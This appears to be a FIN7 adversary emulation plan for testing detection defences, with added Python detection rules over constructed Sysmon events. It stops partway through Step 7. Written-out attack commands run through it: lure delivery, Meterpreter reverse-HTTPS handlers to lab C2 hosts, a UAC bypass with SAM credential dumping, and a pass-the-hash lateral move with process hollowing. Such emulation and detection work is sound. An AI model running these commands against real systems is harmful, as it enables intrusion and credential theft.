# Scenario 1

## Preface

For the purpose of this emulation plan, FIN7 operations have been separated into 2 scenarios (detections and protections), with steps and granular procedures contained within each. This division enables users to separately test the detection and protection capabilities of their defenses. Within each scenario, operations have been broken into specific objectives, which are presented linearly.

While in Scenario 1 each objective enables subsequent objectives, Scenario 2 is designed such that each objective is run independently of any other. Specifically, this scenario (Scenario 1) is intended to be used in an environment that does not have protective/preventative defense measures enabled, so as to assess detection capabilities. That said, each organization can tailor this emulation to their individual use case, priorities, and available resources. The assessing team can begin at any scenario or objective but should do so understanding that each objective enables succeeding objectives.

This emulation plan contains several placeholder values that are meant to be replaced with values specific to the target environment against which this plan is to be run. For ease of use, a script has been included to automatically make these substitutions, found here.
## Overview - Detections

- Emulation of FIN7 usage of tools such as SQLRat, BABYMETAL, BOOSTWRITE, and PILLOWMINT
- Scenario begins after delivery of a reverse shell payload distributed via spearphishing
- Targeted attack of a hospitality organization with the explicit goal of credit card theft
- Designed to assess detection capabilities
## Contents

- Step 0 - Start C2 Server
- Step 1 - Initial Breach
- Step 2 - Delayed Malware Execution
- Step 3 - Target Assessment
- Step 4 - Staging Interactive Toolkit
- Step 5 - Escalate Privileges
- Step 6 - Expand Access
- Step 7 - Setup User Monitoring
- Step 8 - User Monitoring
- Step 9 - Setup Shim Persistence
- Step 10 - Steal Payment Data
## Pre-requisites

Prior to beginning the following emulation Scenario, ensure you have the proper infrastructure requirements and configuration in place as stated in the Scenario 1 Infrastructure documentation.
## Step 0 - Start C2 Server

Before the scenario begins, the attacker needs to start their C2 server to catch their first beacon from the target.

### Procedures

On the Windows Attack Platform:

Open a command prompt and `cd` to the `c2fin7.exe` binary. Execute the following command:

```
[ATT&CK RAT]> C:\c2fin7.exe -server 192.168.0.6
```

On the Linux Attack Platform:

Start `tmux`:

```
tmux
```
## Step 1 - Initial Breach (Evaluations Step 11)

The scenario begins with an initial breach where a legitimate user (T1204) opens an RTF document and double clicks text that says "Double Click Here to Unlock Contents". The RTF file contains an embedded Visual Basic payload (T1027). After double clicking the text block, `mshta.exe` executes (T1170) the Visual Basic payload (T1059). `mshta.exe` then assembles embedded text within the RTF file into a JavaScript payload. Next, `mshta.exe` makes a copy of the legitimate `wscript.exe` on disk as `Adb156.exe` (T1036). `winword.exe` spawns `verclsid.exe` (T1175). `mshta.exe` loads `taskschd.dll` and creates a scheduled task to execute in 5 minutes (T1053).
### Procedures

#### 1.A - User Execution: Malicious File (with licensed Microsoft Word) (T1204.002)

If testing with Microsoft Word, perform the following. If not, perform 1.A* instead.

On the Linux Attack Platform:

Copy `2-list.rtf` to `<domain_admin>`'s Desktop on `hotelmanager`:

```
sudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/SQLRat/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf"
```

Provide `<domain_admin>`'s password when prompted: `<domain_admin_password>`

On hotelmanager:

Log in to the victim workstation as `<domain_admin>`:

```
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
```

Double-click `2-list.rtf` located on `<domain_admin>`'s desktop. Decline any spurious prompts, including updating the document with linked data.

Double-click the text that says "Double Click Here To Unlock Contents".

When prompted to run an `lnk` file, click "open". Set a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file, on the minute, so take 6 to be safe.
#### 1.A* - User Execution: Malicious File (without a Microsoft Word license)

Perform the following if you're testing without Office licenses:

On the Linux Attack Platform:

Upload `2-list.rtf`, `unprotectedNoWord.lnk`, and `obfuscated-payload.vbs` to `hotelmanager` as `2-list.rtf`, `2-list.lnk`, and `payload.vbs` respectively:

```
sudo smbclient -U '<domain_full>\<domain_admin>' //<hotelmanager_ip>/C$ -c "put fin7/Resources/Step1/SQLRat/2-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\2-list.rtf; put /home/<attacker>/Enterprise/fin7/Resources/Step1/unprotectedNoWord.lnk Users\\<domain_admin>.<domain>\\Desktop\\2-list.lnk; put /home/<attacker>/Enterprise/fin7/Resources/Step1/obfuscated-payload.vbs Users\\<domain_admin>.<domain>\\AppData\\Local\\payload.vbs"
```

Provide `<domain_admin>`'s password when prompted: `<domain_admin_password>`

On hotelmanager:

Log in to the victim workstation as `<domain_admin>`:

```
xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hotelmanager_ip>
```

Double-click `2-list.rtf` located on `<domain_admin>`'s desktop. Decline any spurious prompts, including updating the document with linked data.

Double-click `2-list.lnk` on `<domain_admin>`'s Desktop. Set a timer for 6 minutes - the scheduled task will fire 5 minutes after opening the lnk file, on the minute, so take 6 to be safe.
### Cited Intelligence

- FIN7 has created malicious DOCX and RTF lures that convince users to double-click on an image in the document. When a user double-clicks an image, an embedded malicious LNK file is spawned that launches mshta.exe, which executes a VBScript one-liner to decode a script hidden in the document. [4]
- FIN7 has copied wscript.exe into %LOCALAPPDATA% and renamed it. [3, 25]
## Step 2 - Delayed Malware Execution (Evaluations Step 12)

The previously created scheduled task spawns `Adb156.exe` via `svchost` (T1053.005). `Adb156.exe` then loads `scrobj.dll` and executes `sql-rat.js` via jscript (T1059.7). Next, `Adb156.exe` connects to 192.168.0.6 via MSSQL transactions (T1071) (TCP port 1433). Finally, FIN7 performs WMI queries to obtain network configuration information (T1016) and system information (T1082).
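The Step 1 and Step 2 chains leave several host-level traces a defender can key on: an Office process spawning `mshta.exe`, `mshta.exe` loading `taskschd.dll` before the scheduled task appears, and a copy of `wscript.exe` running under another file name from `AppData\Local`. The Python below is an added detection example written for this page; it is not part of the plan or of the ATT&CK Evaluations tooling. It runs three rules over constructed Sysmon-style ProcessCreate (Event ID 1) and ImageLoad (Event ID 7) records. The `OriginalFileName` field Sysmon records on Event ID 1 is the PE version-resource name, which a renamed copy of `wscript.exe` still carries; the user name, paths and command lines in the sample events are made up, and `ntpath` is used so the basename logic runs on any OS.

```python
"""Added example: detect the Step 1/2 execution chain in Sysmon-style events.

Field names mirror Sysmon Event ID 1 (ProcessCreate) and 7 (ImageLoad);
the records themselves are constructed for this page, not real telemetry.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events following the Step 1/2 narrative (user "jdoe" is made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "OriginalFileName": "WinWord.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\Desktop\2-list.rtf"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe vbscript:<payload omitted>"},
    {"EventID": 7, "Image": r"C:\Windows\System32\mshta.exe",
     "ImageLoaded": r"C:\Windows\System32\taskschd.dll"},
    # Step 2: the scheduled task runs the renamed copy of wscript.exe.
    {"EventID": 1, "Image": r"C:\Users\jdoe\AppData\Local\Adb156.exe",
     "OriginalFileName": "wscript.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Users\jdoe\AppData\Local\Adb156.exe /e:jscript sql-rat.js"},
    # Benign: a logon script run by the real wscript.exe from its normal location.
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe \\fileserver\netlogon\map.vbs"},
]


def _base(path):
    """Lower-cased file name of a Windows path (works on non-Windows hosts too)."""
    return ntpath.basename(path).lower()


def office_spawns_script_host(ev):
    """Step 1: WINWORD.EXE launching mshta.exe is rarely legitimate."""
    return (ev["EventID"] == 1
            and _base(ev["ParentImage"]) in OFFICE_APPS
            and _base(ev["Image"]) in SCRIPT_HOSTS)


def renamed_script_host(ev):
    """Step 1/2: Adb156.exe is a copy of wscript.exe, so its version resource
    (Sysmon's OriginalFileName) still says wscript.exe while the file name differs."""
    if ev["EventID"] != 1:
        return False
    original = ev.get("OriginalFileName", "").lower()
    return original in SCRIPT_HOSTS and _base(ev["Image"]) != original


def script_host_loads_task_scheduler(ev):
    """Step 1: a scripting host pulling in taskschd.dll is about to create or
    modify a scheduled task through the Task Scheduler COM API."""
    return (ev["EventID"] == 7
            and _base(ev["Image"]) in SCRIPT_HOSTS
            and _base(ev["ImageLoaded"]) == "taskschd.dll")


RULES = {
    "office_spawns_script_host": office_spawns_script_host,
    "script_host_loads_task_scheduler": script_host_loads_task_scheduler,
    "renamed_script_host": renamed_script_host,
}


def detect(events):
    """Return (rule_name, image) for every event that matches a rule, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["Image"]))
    return hits


if __name__ == "__main__":
    for name, image in detect(SAMPLE_EVENTS):
        print(f"{name:34s} {image}")
```

The renamed-host rule is the one worth keeping in production: it needs no knowledge of the file name the adversary picks, only that the PE's own name and the on-disk name disagree. Expect some noise from vendors that legitimately rename `cscript.exe`, so allowlist by full path rather than disabling the rule.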
### Procedures

#### 2.A - SQLRat Execution via Scheduled Task (T1053.005)

On the Windows Attack Platform:

To verify that you have a new session on `hotelmanager` from your C2 server, run the following command to get the MAC of `hotelmanager`:

```
[ATT&CK RAT]> get-mac-serial
```

#### 2.B - Upload PowerShell Stager

Upload the PowerShell stager via SQLRat:

```
[ATT&CK RAT]> upload-file C:\\stager.ps1 C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\stager.ps1
```
### Cited Intelligence

- FIN7 has created scheduled tasks to establish persistence. [23, 4]
- SQLRat has dropped files and executed SQL scripts on a host system. [5]
- FIN7 has deployed a custom "profiling" script to fingerprint the machine and network environment. [3]
- SQLRat has downloaded a PowerShell script through MSSQL transactions. [5]
## Step 3 - Target Assessment (Evaluations Step 13)

`Adb156.exe` makes WMI queries for process discovery (T1057). Next, `Adb156.exe` spawns `cmd.exe` to execute `net view` (T1135). As a defense evasion tactic, FIN7 leverages `Adb156.exe` to query for virtualization/sandbox information (T1497). FIN7 then leverages `Adb156.exe` to query the `USERNAME` environment variable (T1033) and the `COMPUTERNAME` environment variable (T1082). `Adb156.exe` accesses the Windows Script Host ADSystemInfo COM object by loading `adsldp.dll` and then calling the `DllGetClassObject()` API (T1082). Next, `Adb156.exe` makes another WMI query for System Network Configuration Discovery (T1016) and System Information Discovery (T1082).

Finally, `Adb156.exe` downloads `takeScreenshot.ps1` from 192.168.0.6 via MSSQL transactions. FIN7 then spawns `cmd.exe` (T1059), which launches `powershell.exe` (T1086). FIN7 leverages PowerShell to execute a script that performs a screen capture (T1113) of the local desktop. The screenshot is then uploaded to 192.168.0.6 via MSSQL transactions (T1041).
### Procedures

#### 3.A - Local Discovery (T1057, T1135, T1497, T1033, T1082, T1016)

On the Windows Attack Platform:

Perform initial system triage:

```
[ATT&CK RAT]> enum-system
```

#### 3.B - Screen Capture (T1105, T1059.003, T1059.001, T1113, T1041)

Upload the screenshot utility to take a screenshot of the user's desktop:

```
[ATT&CK RAT]> upload-file C:\\takeScreenshot.ps1 C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\takeScreenshot.ps1
```

Execute the `takeScreenshot.ps1` PowerShell script:

```
[ATT&CK RAT]> exec-cmd "powershell.exe C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\takeScreenshot.ps1"
```

Download the screenshot:

```
[ATT&CK RAT]> download-file C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\Temp\\image.png C:\\image.png
```
### Cited Intelligence

- HALFBAKED has been utilized to listen for commands from the C2 server to carry out tasks such as sending victim machine information and listing processes running. [25]
- FIN7 has deployed capabilities that allow the operators to take a screenshot of the remote system. [25, 4]
## Step 4 - Staging Interactive Toolkit (Evaluations Step 14)

The stager uploaded in stage-1 is now executed, which results in a Meterpreter shell (BABYMETAL) that is used for this step. `Adb156.exe` spawns `cmd.exe` (T1059), which then spawns `powershell.exe` (T1086). `powershell.exe` then decodes an embedded DLL payload (T1140), which is executed via the PowerShell cmdlet `Invoke-Expression` (T1086). Finally, `powershell.exe` loads shellcode into memory (T1140) from data received via a network connection made to port 443 on the C2 server (T1071, T1032).
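Steps 2 and 4 both produce network connections from processes that seldom have a reason to touch the network: the renamed `wscript.exe` copy speaking MSSQL to 192.168.0.6 on TCP 1433, and `powershell.exe` pulling its stage over TLS on port 443. The Python below is an added example for this page, not part of the plan, showing how a defender might score Sysmon NetworkConnect (Event ID 3) records for those patterns; it also covers the Step 10 case of `rundll32.exe` sending HTTPS over port 53, a port/protocol mismatch. Sysmon Event ID 3 does not carry `OriginalFileName`, so the block joins each connection to its Event ID 1 record through `ProcessGuid` to recognise a renamed binary. The process table, the allowlists and the sample connections are all constructed and would need tuning to a real environment.

```python
"""Added example: flag suspicious outbound connections in Sysmon Event ID 3 records.

Rules (allowlists below are constructed for this page, not site baselines):
  lolbin_network - a scripting host or LOLBin opened a network connection
  tds_non_sql    - something other than a known SQL client spoke to TCP 1433
  tcp53_non_dns  - TCP/53 from a process that is not a DNS resolver or server
"""
import ntpath

SCRIPT_HOSTS_AND_LOLBINS = {"wscript.exe", "cscript.exe", "mshta.exe",
                            "powershell.exe", "rundll32.exe", "regsvr32.exe"}
KNOWN_SQL_CLIENTS = {"sqlcmd.exe", "ssms.exe", "sqlservr.exe"}
KNOWN_DNS_PROCESSES = {"svchost.exe", "dns.exe"}

# Constructed Event ID 1 data keyed by ProcessGuid; only the fields the join needs.
PROCESS_TABLE = {
    "{guid-1}": {"OriginalFileName": "wscript.exe"},      # Adb156.exe (Step 2)
    "{guid-2}": {"OriginalFileName": "PowerShell.EXE"},   # powershell.exe (Step 4)
    "{guid-3}": {"OriginalFileName": "RUNDLL32.EXE"},     # rundll32.exe (Step 10)
    "{guid-4}": {"OriginalFileName": "sqlcmd.exe"},
    "{guid-5}": {"OriginalFileName": "chrome.exe"},
    "{guid-6}": {"OriginalFileName": "svchost.exe"},
}

# Constructed Event ID 3 records (outbound connections only).
SAMPLE_CONNECTIONS = [
    {"ProcessGuid": "{guid-1}", "Image": r"C:\Users\jdoe\AppData\Local\Adb156.exe",
     "Protocol": "tcp", "DestinationIp": "192.168.0.6", "DestinationPort": 1433},
    {"ProcessGuid": "{guid-2}", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Protocol": "tcp", "DestinationIp": "192.168.0.4", "DestinationPort": 443},
    {"ProcessGuid": "{guid-3}", "Image": r"C:\Windows\System32\rundll32.exe",
     "Protocol": "tcp", "DestinationIp": "192.168.0.4", "DestinationPort": 53},
    # Benign: a real SQL client, a browser, and the DNS client service
    {"ProcessGuid": "{guid-4}", "Image": r"C:\Program Files\Microsoft SQL Server\Tools\sqlcmd.exe",
     "Protocol": "tcp", "DestinationIp": "10.0.0.5", "DestinationPort": 1433},
    {"ProcessGuid": "{guid-5}", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Protocol": "tcp", "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"ProcessGuid": "{guid-6}", "Image": r"C:\Windows\System32\svchost.exe",
     "Protocol": "udp", "DestinationIp": "192.168.0.1", "DestinationPort": 53},
]


def process_identity(conn, process_table):
    """Name the process by on-disk file name AND by PE OriginalFileName (joined
    from Event ID 1 via ProcessGuid), so a renamed binary is still recognised."""
    names = {ntpath.basename(conn["Image"]).lower()}
    proc = process_table.get(conn["ProcessGuid"])
    if proc and proc.get("OriginalFileName"):
        names.add(proc["OriginalFileName"].lower())
    return names


def classify(conn, process_table):
    """Return the list of rule names the connection trips (empty if none)."""
    tags = []
    names = process_identity(conn, process_table)
    if names & SCRIPT_HOSTS_AND_LOLBINS:
        tags.append("lolbin_network")
    if conn["DestinationPort"] == 1433 and not (names & KNOWN_SQL_CLIENTS):
        tags.append("tds_non_sql")
    if (conn["Protocol"] == "tcp" and conn["DestinationPort"] == 53
            and not (names & KNOWN_DNS_PROCESSES)):
        tags.append("tcp53_non_dns")
    return tags


def detect(connections, process_table):
    """Return (image, destination ip, port, tags) for every flagged connection."""
    flagged = []
    for conn in connections:
        tags = classify(conn, process_table)
        if tags:
            flagged.append((conn["Image"], conn["DestinationIp"], conn["DestinationPort"], tags))
    return flagged


if __name__ == "__main__":
    for image, ip, port, tags in detect(SAMPLE_CONNECTIONS, PROCESS_TABLE):
        print(f"{image} -> {ip}:{port}  {', '.join(tags)}")
```

Because the emulated C2 addresses are inside the 192.168.0.0/16 range, a rule keyed only on "external destination" would miss every connection in this scenario; the rules above deliberately key on the initiating process and the port/protocol pairing instead.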
### Procedures

#### 4.A - Staging Interactive Toolset (T1086)

On the Linux Attack Platform:

Start Metasploit:

```
sudo msfconsole
```

Start a Meterpreter handler on port 443:

```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lport 443
set lhost 192.168.0.4
set ExitOnSession False
exploit -j
```

On the Windows Attack Platform:

Execute the `stager.ps1` script and wait for the Meterpreter callback:

```
[ATT&CK RAT]> exec-cmd "powershell.exe -ExecutionPolicy Bypass -NoExit -File C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\stager.ps1"
```

You should receive a new Meterpreter session on the Linux Attack Platform.
### Cited Intelligence

- FIN7 has executed a PowerShell script to decode and inject shellcode via an embedded DLL into memory. [23, 4, 18]
## Step 5 - Escalate Privileges (Evaluations Step 15)

FIN7 leverages `powershell.exe` to execute the `CreateToolHelp32Snapshot()` Win32 API for process discovery (T1057). Next, `samcat.exe` (a modified version of mimikatz) and `uac-samcats.ps1` are downloaded from the C2 server via `powershell.exe` (T1507). FIN7 then executes `uac-samcats.ps1`. This in turn spawns `powershell.exe` from `powershell.exe` (T1086), followed by executing `samcat.exe` as a high integrity process (T1088). The `samcat.exe` executable reads local credentials from the SAM (T1003.001). Then `powershell.exe` executes the `GetIpNetTable()` API to identify ARP entries (T1016). `powershell.exe` then spawns `nslookup.exe` to query `hoteldc` (`<hoteldc_ip>`) for an IP identified from the ARP entry (T1018).

- Note: SamCats is a modified version of mimikatz that just runs the Mimikatz SAM dumping components.
### Procedures

#### 5.A - Enumerate-Processes, Execute SamCats, and Discover ITAdmin (T1059.001, T1140, T1071.001, T1573.002)

On the Linux Attack Platform:

Interact with the recently obtained Meterpreter session:

```
msf > sessions -i 1
```

List processes:

```
meterpreter > ps -ax
```

Upload `samcat.exe` (modified Mimikatz) and `uac-samcats.ps1` (UAC bypass script) to `hotelmanager`:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step5/samcat.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\samcat.exe"
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step5/uac-samcats.ps1 "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\uac-samcats.ps1"
```

Execute the UAC bypass script:

```
meterpreter > execute -f powershell.exe -H -i -a "-c C:\Users\<domain_admin>.<domain>\AppData\Local\uac-samcats.ps1"
```

Wait for the script to return. You should see credentials dumped to the screen.

Discover ARP entries:

```
meterpreter > arp
```

Perform `nslookup` against `itadmin`:

```
meterpreter > execute -f nslookup.exe -H -i -a "<itadmin_ip>"
```
### Cited Intelligence

- FIN7 has used memory scrapers such as mimikatz to dump the passwords of logged on users. [9, 6]
- The Carbanak malware has contained a UAC bypass. [10]
- FIN7 has used tools such as PowerSploit to pivot to additional hosts. [6]
## Step 6 - Expand Access (Evaluations Step 16)

Step 6A begins by downloading `paexec.exe` and `hollow.exe` via `powershell.exe` (T1105) to `AppData\Local\` of the current Meterpreter session user. Next, FIN7 interacts with the target through Meterpreter, spawning `powershell.exe` from `cmd.exe` (T1059.003). The password hash obtained from `samcats.exe` is leveraged by paexec (T1021.002) to copy `hollow.exe` onto the IT Admin host as user kmitnick. The executable `paexec.exe` starts a temporary Windows service (T1035) during the copying process, called `PAExec-{PID}-{HOSTNAME}.exe`, which executes `hollow.exe` (T1021.002). The executable `hollow.exe` spawns `svchost.exe` and unmaps its memory image (T1055.012). Then, `svchost` exchanges data with 192.168.0.4 over HTTPS (T1071.001, T1573.002).
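Two artifacts of this step are cheap to alert on: the service PAExec registers on the remote host follows the `PAExec-{PID}-{HOSTNAME}.exe` naming the narrative gives, and a hollowed `svchost.exe` is started by `hollow.exe` rather than by `services.exe`. The Python below is an added example for this page (not part of the plan) that checks a Windows System log Event ID 7045 (service installed) record for the PAExec name shape and a Sysmon Event ID 1 record for an `svchost.exe` with an unexpected parent or without the `-k <group>` argument every service-host instance launched by the Service Control Manager carries. The sample events, the service PID, the host name and the path `hollow.exe` runs from are constructed.

```python
"""Added example: two Step 6 indicators from Windows event data.

  paexec_service_install - System log Event ID 7045 whose ServiceName has the
                           PAExec-{PID}-{HOSTNAME}.exe shape described in the plan
  anomalous_svchost      - Sysmon Event ID 1 for svchost.exe whose parent is not
                           services.exe, or whose command line lacks "-k <group>"
All events below are constructed for this page.
"""
import ntpath
import re

PAEXEC_SERVICE = re.compile(r'^PAExec-\d+-[^\\/:*?"<>|]+\.exe$', re.IGNORECASE)
SVCHOST_PARENTS = {"services.exe"}   # extend per site if other legitimate parents exist
SVCHOST_GROUP_ARG = re.compile(r"(^|\s)-k\s+\S+", re.IGNORECASE)

SAMPLE_EVENTS = [
    # Constructed 7045: the transient service PAExec creates while copying hollow.exe
    {"EventID": 7045, "ServiceName": "PAExec-4812-ITADMIN.exe",
     "ImagePath": r"C:\Windows\PAExec-4812-ITADMIN.exe -service"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    # Constructed Sysmon Event 1: svchost.exe launched by hollow.exe for hollowing
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe", "ParentImage": r"C:\Windows\hollow.exe"},
    # Benign: a normal service host started by the Service Control Manager
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def paexec_service_install(ev):
    """7045 with a PAExec-<pid>-<host>.exe service name."""
    return ev["EventID"] == 7045 and PAEXEC_SERVICE.match(ev["ServiceName"]) is not None


def anomalous_svchost(ev):
    """svchost.exe that the Service Control Manager did not start the normal way."""
    if ev["EventID"] != 1 or ntpath.basename(ev["Image"]).lower() != "svchost.exe":
        return False
    parent_ok = ntpath.basename(ev["ParentImage"]).lower() in SVCHOST_PARENTS
    has_group = SVCHOST_GROUP_ARG.search(ev["CommandLine"]) is not None
    return not (parent_ok and has_group)


RULES = {
    "paexec_service_install": paexec_service_install,
    "anomalous_svchost": anomalous_svchost,
}


def detect(events):
    """Return (rule_name, subject) pairs; subject is the service name or image path."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.get("ServiceName") or ev.get("Image")))
    return hits


if __name__ == "__main__":
    for name, subject in detect(SAMPLE_EVENTS):
        print(f"{name:24s} {subject}")
```

The 7045 rule also works retrospectively: PAExec deletes its service when the remote command finishes, but the installation event stays in the System log of the target host.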
### Procedures

#### 6.A - Expand Access (T1105, T1059.003, T1078.002, T1021.002, T1569.002, T1055.012)

On the Linux Attack Platform:

Upload the lateral movement utility, `paexec.exe`:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step6/paexec.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\paexec.exe"
```

Upload the `hollow.exe` (process hollowing) executable:

```
meterpreter > upload /home/<attacker>/Enterprise/fin7/Resources/Step6/hollow.exe "C:\\Users\\<domain_admin>.<domain>\\AppData\\Local\\hollow.exe"
```

Drop into an interactive session on the target host:

```
meterpreter > shell
```

Change directory to `C:\Users\<domain_admin>.<domain>\AppData\Local`:

```
cmd > cd "C:\Users\<domain_admin>.<domain>\AppData\Local"
```

Use `paexec.exe` to perform pass-the-hash to execute `hollow.exe` on `itadmin`:

```
cmd > paexec.exe \\<itadmin_ip> -s -u <domain>\<domain_admin> -p <domain_admin_password_hash> -c -csrc ".\hollow.exe" hollow.exe
```

Wait to receive a new Meterpreter session and for `paexec` to return. If `paexec` never finishes execution, press enter a few times and wait for the prompt to return.

Exit the CMD prompt from within the Meterpreter session:

```
cmd > exit
```

Background the current Meterpreter session:

```
meterpreter > background
```
### Cited Intelligence

- FIN7 has used PAExec to execute remote commands and move laterally within an environment. [9, 6]
- FIN7 has performed process injection to execute malicious payloads from memory. [19, 13]
## Step 7 - Setup User Monitoring (Evaluations Step 17)

Step 7 focuses on emulating the DLL Hijacking and module execution functionality of BOOSTWRITE. This step starts by creating a BOOSTWRITE Meterpreter handler as well as staging a temporary Python HTTP server hosting an `index.html` page with the ASCII character "B". Next, `svchost.exe` (Meterpreter session obtained via `hollow.exe` execution) downloads `BOOSTWRITE.dll` to `C:\Windows\SysWOW64\srrstr.dll` (T1105). The `srrstr.dll` DLL is masquerading to match the legitimate name of `srrstrl.dll`, which is found in `C:\Windows\System32`. Next, `cmd.exe` spawns from `svchost.exe` (T1059.003), which executes `SystemPropertiesAdvanced.exe`, which in turn loads and executes the malicious `srrstr.dll` (T1574). After `srrstr.dll` has been loaded and executed, `rundll32.exe` is spawned as a child process to communicate with the C2 server over HTTPS on port 8080 (T1071, T1573), granting a new shell to the adversary.
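The hijack above has a distinctive shape in endpoint telemetry: a DLL is written into a Windows system directory by a process that is not a servicing or installer component, the DLL is then loaded by a signed Microsoft binary, and that binary spawns `rundll32.exe`. The Python below is an added example for this page (not part of the plan or of BOOSTWRITE analysis) that correlates constructed Sysmon FileCreate (Event ID 11), ImageLoad (Event ID 7) and ProcessCreate (Event ID 1) records in time order to produce three alerts. The installer allowlist, the `Signed` values and the sample paths are constructed; in Sysmon's XML the `Signed` field is the string `true` or `false`, which the code mirrors.

```python
"""Added example: Step 7 DLL-hijack indicators from Sysmon events.

  dll_written_then_loaded - a .dll created under a Windows system directory by a
                            process that is not a known installer, later loaded by
                            some process (Event ID 11 followed by Event ID 7)
  unsigned_system_dll     - Event ID 7 load of an unsigned DLL from a system directory
  rundll32_from_sysprops  - Event ID 1 rundll32.exe child of SystemPropertiesAdvanced.exe
All records below are constructed for this page.
"""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
INSTALLERS = {"tiworker.exe", "trustedinstaller.exe", "msiexec.exe", "poqexec.exe"}

SAMPLE_EVENTS = [  # chronological order matters for the correlation
    # Step 7: the hollowed svchost.exe (Meterpreter) writes BOOSTWRITE as srrstr.dll
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\SysWOW64\srrstr.dll"},
    # SystemPropertiesAdvanced.exe picks the planted DLL up from its own directory
    {"EventID": 7, "Image": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\srrstr.dll", "Signed": "false", "Signature": ""},
    # ... and spawns rundll32.exe for the C2 channel (command line omitted)
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\rundll32.exe", "CommandLine": "rundll32.exe",
     "ParentImage": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe"},
    # Benign: Windows servicing replaces a system DLL, later loaded signed by notepad
    {"EventID": 11, "Image": r"C:\Windows\servicing\TrustedInstaller.exe",
     "TargetFilename": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true",
     "Signature": "Microsoft Windows"},
]


def _base(path):
    return ntpath.basename(path).lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def analyze(events):
    """Single pass over time-ordered events; remembers DLLs dropped by non-installers."""
    dropped = {}   # lower-cased dll path -> writer image
    alerts = []
    for ev in events:
        if ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if (target.lower().endswith(".dll") and in_system_dir(target)
                    and _base(ev["Image"]) not in INSTALLERS):
                dropped[target.lower()] = ev["Image"]
        elif ev["EventID"] == 7:
            loaded = ev["ImageLoaded"]
            if loaded.lower() in dropped:
                alerts.append({"rule": "dll_written_then_loaded", "dll": loaded,
                               "writer": dropped[loaded.lower()], "loader": ev["Image"]})
            if in_system_dir(loaded) and ev.get("Signed", "").lower() != "true":
                alerts.append({"rule": "unsigned_system_dll", "dll": loaded,
                               "loader": ev["Image"]})
        elif ev["EventID"] == 1:
            if (_base(ev["Image"]) == "rundll32.exe"
                    and _base(ev["ParentImage"]) == "systempropertiesadvanced.exe"):
                alerts.append({"rule": "rundll32_from_sysprops", "child": ev["Image"],
                               "parent": ev["ParentImage"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The write-then-load correlation is the most robust of the three because it does not depend on knowing which DLL name the loader will look for; the unsigned-DLL rule needs a baseline first, since some third-party components legitimately ship unsigned DLLs into `System32`.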
### Procedures

#### 7.A - Boostwrite (T1105, T1036.005, T1059.003, T1574.001, T1071.001, T1573.002)

On the Linux Attack Platform:

Open a new `tmux` window:

```
Ctrl+b c
```

Set up a Python SimpleHTTPServer to host the XOR key:

```
echo "B" > /tmp/index.html; cd /tmp/; sudo python3 -m http.server 80
```

Switch back to the Metasploit terminal:

```
Ctrl+b n
```

Set up a Meterpreter handler on 8080 for the BOOSTWRITE shell:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport 8080
set lhost 192.168.0.4
set ExitOnSession False
exploit -j
```

